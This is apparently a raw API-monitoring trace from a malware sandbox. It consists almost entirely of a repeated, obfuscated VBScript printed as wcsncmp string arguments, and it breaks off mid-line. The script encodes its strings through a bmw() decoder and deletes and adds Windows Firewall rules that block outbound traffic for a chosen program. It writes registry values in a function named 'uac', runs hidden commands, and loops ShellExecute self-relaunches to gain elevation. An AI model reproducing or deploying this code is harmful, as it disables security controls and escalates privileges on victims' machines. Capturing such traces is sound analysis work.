bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 71 [0226.323] wcsncmp (_String1="ION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 60 [0226.323] wcsncmp (_String1="ON_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 66 [0226.323] wcsncmp (_String1="N_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 65 [0226.323] wcsncmp (_String1="_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 82 [0226.323] wcsncmp (_String1="BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = 